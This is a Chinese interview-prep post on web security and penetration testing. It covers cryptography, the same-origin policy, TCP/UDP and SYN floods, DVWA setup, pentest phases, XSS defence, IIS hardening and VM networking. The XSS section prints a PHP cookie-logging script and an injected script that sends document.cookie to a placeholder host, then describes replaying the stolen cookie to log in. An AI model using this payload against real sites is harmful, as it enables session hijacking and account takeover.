筆試題———1、網絡安全、Web安全、滲透測試筆試總結

2020-12-13 R0inSec

本篇文章主要涉及一下幾個方面:

對稱加密非對稱加密?什麼是同源策略?cookie存在哪裡?可以打開嗎xss如何盜取cookie?tcp、udp的區別及tcp三次握手,syn攻擊?證書要考哪些?DVWA是如何搭建的?滲透測試的流程是什麼xss如何防禦IIS伺服器應該做哪些方面的保護措施:虛擬機的幾種連接方式及原理xss有cookie一定可以無用戶名密碼登錄嗎?對稱加密 非對稱加密?對稱加密:加解密用同一密鑰,密鑰維護複雜 n(n-1)/2,不適合網際網路傳輸密鑰,加解密效率高。應用於加密數據。非對稱加密:公鑰推不出私鑰,每個用戶一個非對稱密鑰對就可以,適合於網際網路傳輸公鑰,但是加密效率低,應用於數字籤名及加密。

什麼是同源策略?

為了防止不同域在用戶瀏覽器中彼此幹擾,瀏覽器對從不同來源(域)收到的內容進行隔離。瀏覽器不允許任何舊有腳本訪問一個站點的cookie,否則,會話容易被劫持。

只有發布cookie的站點能夠訪問這些cookie,只有通過該站點返回的頁面所包含或加載的JavaScript才能訪問cookie。

cookie存在哪裡?可以打開嗎

C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies工具--文件夾選項--查看--將隱藏被保護的文件的對勾去掉就會看到cookies文件夾。

xss如何盜取cookie?

攻擊者代碼:

<?php$cookie=$_GET['cookie'];$time=date('Y-m-d g:i:s');$referer=getenv('HTTP_REFERER');$cookietxt=fopen('cookie.txt','a');fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer.""); 注意雙引號,容易出錯fclose($cookietxt);?>腳本端:

<script>document.write('<img src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script>獲取到cookie後,用firebug找到cookie,新建cookie加入cookie,用referer來提交,無需輸入帳號密碼直接登錄進去!

tcp、udp的區別及tcp三次握手,syn攻擊?

一、tcp、udp區別

TCP的優點:

可靠,穩定TCP的可靠體現在TCP在傳遞數據之前,會有三次握手來建立連接,而且在數據傳遞時,有確認、窗口、重傳、擁塞控制機制,在數據傳完後,還會斷開連接用來節約系統資源。TCP的缺點:慢,效率低,佔用系統資源高,易被攻擊TCP在傳遞數據之前,要先建連接,這會消耗時間,而且在數據傳遞時,確認機制、重傳機制、擁塞控制機制等都會消耗大量的時間,而且要在每臺設備上維護所有的傳輸連接,事實上,每個連接都會佔用系統的CPU、內存等硬體資源。而且,因為TCP有確認機制、三次握手機制,這些也導致TCP容易被人利用,實現DOS、DDOS、CC等攻擊。

UDP的優點:

快,比TCP稍安全UDP沒有TCP的握手、確認、窗口、重傳、擁塞控制等機制,UDP是一個無狀態的傳輸協議,所以它在傳遞數據時非常快。沒有TCP的這些機制,UDP較TCP被攻擊者利用的漏洞就要少一些。但UDP也是無法避免攻擊的,比如:UDP Flood攻擊……UDP的缺點:不可靠,不穩定因為UDP沒有TCP那些可靠的機制,在數據傳遞時,如果網絡質量不好,就會很容易丟包。基於上面的優缺點,那麼:什麼時候應該使用TCP:當對網絡通訊質量有要求的時候,比如:整個數據要準確無誤的傳遞給對方,這往往用於一些要求可靠的應用,比如HTTP、HTTPS、FTP等傳輸文件的協議,POP、SMTP等郵件傳輸的協議。在日常生活中,常見使用TCP協議的應用如下:瀏覽器,用的HTTPFlashFXP,用的FTPOutlook,用的POP、SMTPPutty,用的Telnet、SSHQQ文件傳輸…………什麼時候應該使用UDP:當對網絡通訊質量要求不高的時候,要求網絡通訊速度能儘量的快,這時就可以使用UDP。比如,日常生活中,常見使用UDP協議的應用如下:QQ語音QQ視頻TFTP二、TCP握手協議在TCP/IP協議中,TCP協議提供可靠的連接服務,採用三次握手建立一個連接。第一次握手:建立連接時,客戶端發送syn包(syn=j)到伺服器,並進入SYN_SEND狀態,等待伺服器確認;第二次握手:伺服器收到syn包,必須確認客戶的SYN(ack=j+1),同時自己也發送一個SYN包(syn=k),即SYN+ACK包,此時伺服器進入SYN_RECV狀態;第三次握手:客戶端收到伺服器的SYN+ACK包,向伺服器發送確認包ACK(ack=k+1),此包發送完畢,客戶端和伺服器進入ESTABLISHED狀態,完成三次握手。完成三次握手,客戶端與伺服器開始傳送數據,在上述過程中,還有一些重要的概念:未連接隊列:在三次握手協議中,伺服器維護一個未連接隊列,該隊列為每個客戶端的SYN包(syn=j)開設一個條目,該條目表明伺服器已收到SYN包,並向客戶發出確認,正在等待客戶的確認包。這些條目所標識的連接在伺服器處於Syn_RECV狀態,當伺服器收到客戶的確認包時,刪除該條目,伺服器進入ESTABLISHED狀態。 backlog參數:表示未連接隊列的最大容納數目。SYN-ACK 重傳次數 伺服器發送完SYN-ACK包,如果未收到客戶確認包,伺服器進行首次重傳,等待一段時間仍未收到客戶確認包,進行第二次重傳,如果重傳次數超過系統規定的最大重傳次數,系統將該連接信息從半連接隊列中刪除。注意,每次重傳等待的時間不一定相同。半連接存活時間:是指半連接隊列的條目存活的最長時間,也即服務從收到SYN包到確認這個報文無效的最長時間,該時間值是所有重傳請求包的最長等待時間總和。有時我們也稱半連接存活時間為Timeout時間、SYN_RECV存活時間。三、SYN攻擊原理SYN攻擊屬於DOS攻擊的一種,它利用TCP協議缺陷,通過發送大量的半連接請求,耗費CPU和內存資源。SYN攻擊除了能影響主機外,還可以危害路由器、防火牆等網絡系統,事實上SYN攻擊並不管目標是什麼系統,只要這些系統打開TCP服務就可以實施。從上圖可看到,伺服器接收到連接請求(syn=j),將此信息加入未連接隊列,並發送請求包給客戶(syn=k,ack=j+1),此時進入SYN_RECV狀態。當伺服器未收到客戶端的確認包時,重發請求包,一直到超時,才將此條目從未連接隊列刪除。配合IP欺騙,SYN攻擊能達到很好的效果,通常,客戶端在短時間內偽造大量不存在的IP位址,向伺服器不斷地發送syn包,伺服器回復確認包,並等待客戶的確認,由於源地址是不存在的,伺服器需要不斷的重發直至超時,這些偽造的SYN包將長時間佔用未連接隊列,正常的SYN請求被丟棄,目標系統運行緩慢,嚴重者引起網絡堵塞甚至系統癱瘓。

證書要考哪些?

信息安全國際第一認證——CISSP信息安全國內認證——CISAW信息安全國內認證——CISP信息安全技術實操認證新貴——Security+IT審計人員的必備之證——CISA

DVWA是如何搭建的?

啟動xampp(XAMPP(Apache+MySQL+PHP+PERL)是一個功能強大的建站集成軟體包。)下的apache中間件和mysql將dvwa放到xampp下的htdocs目錄下在瀏覽器輸入http://127.0.0.1/dvwa 即可使用啦!還有owasp的漏洞練習平臺:https://sourceforge.net/projects/owaspbwa/files/

滲透測試的流程是什麼

滲透測試流程概述前期交互階段、情報搜集階段、威脅建模階段、漏洞分析階段、滲透攻擊階段(Exploitation)、後滲透攻擊階段(怎麼一直控制,維持訪問)、報告階段。攻擊前:網絡踩點、網絡掃描、網絡查點攻擊中:利用漏洞信息進行滲透攻擊、獲取權限攻擊後:後滲透維持攻擊、文件拷貝、木馬植入、痕跡擦除

xss如何防禦

1.對前端輸入做過濾和編碼:比如只允許輸入指定類型的字符,比如電話號格式,註冊用戶名限制等,輸入檢查需要在伺服器端完成,在前端完成的限制是容易繞過的;對特殊字符進行過濾和轉義;2.對輸出做過濾和編碼:在變量值輸出到前端的HTML時進行編碼和轉義;3.給關鍵cookie使用http-only

IIS伺服器應該做哪些方面的保護措施:

整理來源:http://www.williamlong.info/archives/118.html1. 保持Windows升級:2. 使用IIS防範工具3. 移除預設的Web站點4. 如果你並不需要FTP和SMTP服務,請卸載它們5. 有規則地檢查你的管理員組和服務:6. 嚴格控制伺服器的寫訪問權限7. 設置複雜的密碼8. 減少/排除Web伺服器上的共享9. 禁用TCP/IP協議中的NetBIOS:10. 使用TCP埠阻塞11. 仔細檢查*.bat和*.exe 文件: 每周搜索一次*.bat12. 管理IIS目錄安全:13. 使用NTFS安全:14. 管理用戶帳戶15. 審計你的Web伺服器:

虛擬機的幾種連接方式及原理

安裝完虛擬機後,默認安裝了兩個虛擬網卡,VMnet1和VMnet8,其他的未安裝(當然也可以手動安裝其他的)。其中VMnet1是host網卡,用於host方式連接網絡的。VMnet8是NAT網卡,用於NAT方式連接網絡的。它們的IP位址是隨機生成的,如果要用虛擬機做實驗的話,最好將VMnet1到VMnet8的IP位址改掉。習慣上把VMware虛擬網卡使用的網段"固定",使用如下原則:VMnet1對應的網段是192.168.10.0,

VMnet2對應的網段是192.168.20.0,其他的類似。當然平常只是隨便用用的就不用改了,能上網就行了。VMware網絡連接的方式主要有:橋接(Bridged)、NAT、主機網絡(Host-Only)。1. Use bridged networking(使用橋接網絡)說明:使用VMnet0虛擬交換機,此時虛擬機相當與網絡上的一臺獨立計算機與主機一樣,擁有一個獨立的IP位址,其網絡拓撲如圖1所示,使用橋接方式,A,A1,A2,B可互訪。

2. Use network addresstranslation(NAT)說明:使用Vmnet8虛擬交換機,此時虛擬機可以通過主機單向網絡上的其他工作站,其他工作站不能訪問虛擬機。其網絡拓撲如圖2所示,使用NAT方式,A1,A2可以訪問B,但B不可以訪問A1,A2。但A,A1,A2可以互訪。

3. Use Host-Only networking(使用主機網絡)說明:使用Vmnet1虛擬交換機,此時虛擬機只能與虛擬機、主機互訪。也就是不能上Internet,其網絡拓撲如圖3所示,使用Host方式,A,A1,A2可以互訪,但A1,A2不能訪問B,也不能被B訪問。

xss有cookie一定可以無用戶名密碼登錄嗎?

基本可以。因為把cookie的值給瀏覽器,瀏覽器去訪問頁面會用已有的cookie去訪問,如果cookie有效,就會直接進去

相關焦點

  • 零基礎如何學習Web安全滲透測試?這可能是史上最詳細的自學路線圖!
    ,但是零基礎不知道怎麼入門,然後直接去看了市面上的一些網絡安全書籍,例如道哥的《白帽子講Web安全》,也看了一些烏雲案例,但感覺自己沒啥收穫?階段 Web 技術入門1.0 學習導論此階段,我們的學習目標是了解網絡安全行業的法律法規 / 學習方法 / 求職目標,搭建屬於自己的博客 / 論壇 / 網站(成為一名站長)、掌握 Web 技術架構、搞懂瀏覽器和網站之間的通信原理。
  • web滲透測試對信息收集的方法介紹
    什麼是web滲透測試?一般是指通過模擬黑客的攻擊手法,對計算機網絡系統進行安全評估測試,如果發現系統中存在漏洞,向被測試系統的所有者提交滲透報告,並提出補救措施。這一章將通過滲透測試Web應用和伺服器,向大家介紹滲透測試的方法和技巧。
  • 內網安全攻防之內網滲透測試基礎
    類似於NAT2.Kali Linux滲透平臺機常用工具 kali Linux是公認的滲透測試必備平臺,它包含大量不同類型的安全工具。Responder(嗅探網絡中所有的LLMNR包,獲取主機的信息)DSHashes(從NTDSXtract中提取用戶易於理解的散列值)PowerSploit(一款基於PowerShell的後滲透測試框架)Nishang(一款針對Powershell的滲透測試工具)ps_encoder.py(使用Base64編碼封裝的Powershell命令包)smbexec(一個使用samba工具的快速psExec
  • 大學生網絡安全攻防技能暑期精品培訓班
    安雲科技聚集了十多位專業的安全攻防技術研究人員,在信息安全風險評估、滲透測試、web安全、攻擊取證、軟體逆向、漏洞挖掘領域有深入的研究和成果。Web伺服器滲透測試第十三章  攻擊web應用8月1日8月2日Web應用程式的概念參數篡改目錄遍歷跨站腳本Web爬蟲Cookie病毒和cookie參數篡改安全web應用劫持實驗環境:
  • Web安全:內網滲透工具
    在網絡空間中,大部分的安全問題都源自內網。事實上,黑客們一般談論的滲透都是指內網的滲透(包括外網等公開的網絡空間),即黑客在獲取目標網站的webshell並進入內網以後,就可通過內網滲透工具不斷提升自己權限,以達到控制整個內網的目的。
  • [網絡安全] 二.Web滲透信息收集之域名、埠、服務、指紋、旁站、CDN和敏感信息
    娜璋AI安全之家於2020年8月18日開設,將專注於Python和安全技術,主要分享Web滲透、系統安全、人工智慧、大數據分析、圖像識別、惡意代碼檢測、CVE復現、威脅情報分析等文章。真心想把自己近十年的所學所做所感分享出來,與大家一起進步。這篇文章重構作者CSDN的系列,也參考了B站、謝公子和Agan兄的文章,真心推薦白帽、謝公子和Agan兄的文章,真的寫得棒。
  • 網站安全維護之滲透測試公司詳情
    哈嘍大家好,近期我們Sine安全對客戶平臺進行滲透測試的時候,發現有一些命令執行的漏洞測試語句和函數,導致伺服器被提權被入侵,上一節提到XSS跨站腳本攻擊檢測方法,本章來總和一下腳本執行命令的詳細檢測手段,以及繞過waf的辦法,只有這樣詳細的對平臺進行安全測試才能保障整個平臺安全穩定。3.5.1.
  • 如何入門網站安全滲透測試
    從大學畢業的時候開始簡單入門,寫寫網站程序代碼,搞搞sql注入以及安全測試,到現在Sinesafe當安全工程師,差不多在安全行業成長了11年,發現不懂得問題隨著實戰滲透測試中非常多,還是學到老乾到老才是成功之道。
  • 常規web滲透測試漏洞合集
    修復建議  1、用戶登錄信息使用加密傳輸,如密碼在傳輸前使用安全的算法加密後傳輸,可採用的算法包括:不可逆hash算法加鹽(4位及以上隨機數,由伺服器端產生);安全對稱加密算法,如AES(128、192、256位),且必須保證客戶端密鑰安全,不可被破解或讀出;非對稱加密算法,如RSA(不低於1024位)、SM2等。
  • Kali Linux Web滲透測試手冊(第二版) - 3.1 - 使用DirBuster尋找敏感文件和目錄
    最近啥都學,學的腦子亂,準備理清下思路分享一下信息收集,至少目前是我的方法,信息收集再好,也奈何不了各種難題,正所謂信息收集兩小時,滲透測試五分鐘,GG...還是要努力學習硬知識,知識就是硬道理!!!另外,各位老哥需要什麼資源的話,可以給我留言,我有的話給你分享。
  • 」網絡安全寒假特訓營」即將開啟,等你來打call
    代理預備工具學習防護措施滲透測試第四章  枚舉 枚舉的概念提取相對更加專業的內容:  用戶名和用戶組  計算機列表及作業系統和埠  機器名,網絡資源和服務  網絡中個人主機的共享列表  策略及密碼實驗環境
  • i春秋:"千星計劃"點亮網絡安全世界的星空
    用鄭總的話概括,就是用解決信息安全網絡人才的i春秋模式,把網絡安全人才培養帶入到定製化和工業化的時代,然後為企業輸送安全人才。企業需要安全人才,而安全人才的劃分也是多維度的。從剛開始的web安全工程師,慢慢向安全運維、逆向、滲透這些方向鋪展開來。包括百度、滴滴、騰訊在內的多家企業都與i春秋教育平臺展開過人才合作。
  • 武漢網絡安全培訓中心-滲透測試教程-網盾科技推薦就業
    2019年中國網絡安全人才需求量(圖1.12019年我國網絡安全人才缺口超70萬,國內3000所高校僅120所開設相關專業,年培養1萬-2萬人,加上10-20家社會機構,全國每年相關人才輸送量約為中國網絡安全崗位時長統計(圖1.3)越來越多的行業從業者上升到一定階段便再難進步,很容易被新人取代,但網絡安全與其他行業的可取代性不同,網絡安全工程師將在未來幾十年都處於緊缺狀態,
  • 滲透測試學習書籍推薦
    該書內容符合「Web安全」的主題,沒有過多涉及其他領域的知識,相對比較專一,深度和廣度適中,有一定的原理講解,算是由淺入深了。         該書雖比《Web安全攻防:滲透測試實戰指南》少了56頁,但是就Web滲透的內容來說會更加深入、細緻,適合有一定計算機基礎的人閱讀學習。
  • 2018全國網絡安全高級研修班邀請
    為深入貫徹習近平總書記網絡強國戰略思想,加快網信人才隊伍建設,完善網絡空間安全人才教育培養機制,提高高校網絡安全、信息安全專業教學水平,針對滲透測試
  • 專為滲透測試人員設計的Python工具大合集
    滲透測試就是滲透測試工程師完全模擬黑客可能使用的攻擊技術和漏洞發現技術,對目標網絡、主機、應用的安全作深入的探測,發現系統最脆弱的環節。如果說安全檢測是「橫向地毯式自動化掃描」,那麼滲透測試就是「縱向深度人工化入侵」。可見滲透測試的目的是發現目標系統潛在的業務漏洞風險。
  • 2021暗月滲透測試全棧學習班
    Me and My Girlfriend 1暗月靶機系列測試視頻09 Connect-the-dots暗月靶機系列測試視頻10 djinn1暗月靶機測試系列視頻11 domdom暗月靶機測試系列視頻12 Os-hackNos-2暗月靶機測試系列視頻13 ReconForce暗月靶機測試系列視頻14 haclabs-no_name第二十天 docker教程3課01 docker安裝lnmp環境02
  • 網絡安全怎麼學?2020最新最全網絡安全學習路線|建議收藏
    2017年我國網絡安全人才缺口超 70萬 ,國內3000所高校僅120所開設相關專業,年培養1萬-2萬人,加上10 - 20家社會機構,全國每年相關人才輸送量約為3萬,距離70萬缺口差距達 95% ,此外,2020年網絡安全人才需求量直線增長,預計達到140萬,屆時,人才需求將飆升232%!如何去學習網絡安全?
  • 滲透測試 對文件上傳安全檢測與webshell分析
    前段時間我們SINE安全收到客戶的滲透測試服務委託,在這之前,客戶網站受到攻擊,數據被篡改,要求我們對網站進行全面的滲透測試,包括漏洞的檢測與測試,邏輯漏洞.垂直水平越權漏洞,文件上傳漏洞.等等服務項目,在進行安全測試之前,我們對客戶的網站大體的了解了一下,整個平臺網站,包括APP,安卓端,IOS端都採用的JSP+oracle資料庫架構開發,前端使用VUE,伺服器是linux
  • 2020暗月滲透測試全棧學習班
    7課01 內網滲透篇_隧道技術ssh隧道02 內網滲透篇 埠轉發與埠映射03 內網滲透篇_隧道技術socket隧道04 內網滲透篇_跨路由掃描05 內網滲透篇_常見的內網測試06 內網滲透篇_域的搭建07 內網滲透篇一次完整的域滲透第十五天 exp編寫篇8課01 注入exp的簡單編寫02 簡單注入exp編寫 python03 POST注入exp編寫04 getshell exp編寫05 需要驗證的